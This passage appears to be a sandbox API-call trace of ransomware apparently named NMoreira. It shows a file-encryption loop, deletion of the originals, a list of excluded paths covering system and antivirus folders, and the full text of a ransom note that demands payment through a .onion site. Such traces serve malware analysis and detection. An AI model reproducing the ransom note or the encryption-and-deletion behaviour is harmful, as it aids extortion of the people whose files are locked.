pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.390] GetLastError () returned 0x0 [0148.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.390] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.391] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.391] GetLastError () returned 0x0 [0148.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.392] GetLastError () returned 0x0 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.392] GetLastError () returned 0x0 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.392] GetLastError () returned 0x0 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.392] GetLastError () returned 0x0 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.392] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0148.392] GetLastError () returned 0x0 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0148.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0148.392] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0148.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui")) returned 0x20 [0148.393] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0148.393] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned 1 [0148.393] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui")) returned 0 [0148.393] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" [0148.393] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR") returned 1 [0148.393] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\.xXB6A0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\.xxb6a0.tmp")) returned 0xb6a0 [0148.394] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\.xXB6A0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\.xxb6a0.tmp"), dwFlags=0x1) returned 0 [0148.394] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\.xXB6A0.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\.xxb6a0.tmp")) returned 1 [0148.395] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0148.395] wcslen (_String="OK") returned 0x2 [0148.395] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.395] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.395] CryptDestroyKey (hKey=0x9ad438) returned 1 [0148.395] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0148.395] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0148.395] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0148.395] GetLastError () returned 0x12 [0148.395] FindClose (in: hFindFile=0x9ad578 | out: hFindFile=0x9ad578) returned 1 [0148.395] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0148.395] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.396] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0148.396] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0148.396] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.396] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.396] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0148.396] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.396] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.exe") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.dll") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.lnk") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.bat") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.ini") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.msi") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*.scf") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*pagefile.sys*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*NTUSER.DAT*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*AppData*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\winrar\\*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\java\\*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\windows\\*") returned 0 [0148.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\ESET\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\AVG\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\AVIRA\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*Atheros*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*Realtek*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*bootmgr*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*boot*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*boot*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*CONFIG.SYS*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*IO.SYS*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*MSDOS.SYS*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*NTDETECT.COM*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*ntldr*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*chrome*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*opera*") returned 0 [0148.397] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", pszSpec="*firefox*") returned 0 [0148.397] wcslen (_String="\\\\?\\") returned 0x4 [0148.397] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad738 [0148.397] wcscmp (_String1=".", _String2=".") returned 0 [0148.397] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.397] wcscmp (_String1="..", _String2=".") returned 1 [0148.397] wcscmp (_String1="..", _String2="..") returned 0 [0148.397] FindNextFileW (in: hFindFile=0x9ad738, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.397] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.398] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.398] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-GB\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.398] strlen (_Str="NMoreira") returned 0x8 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.398] CryptGenRandom (in: 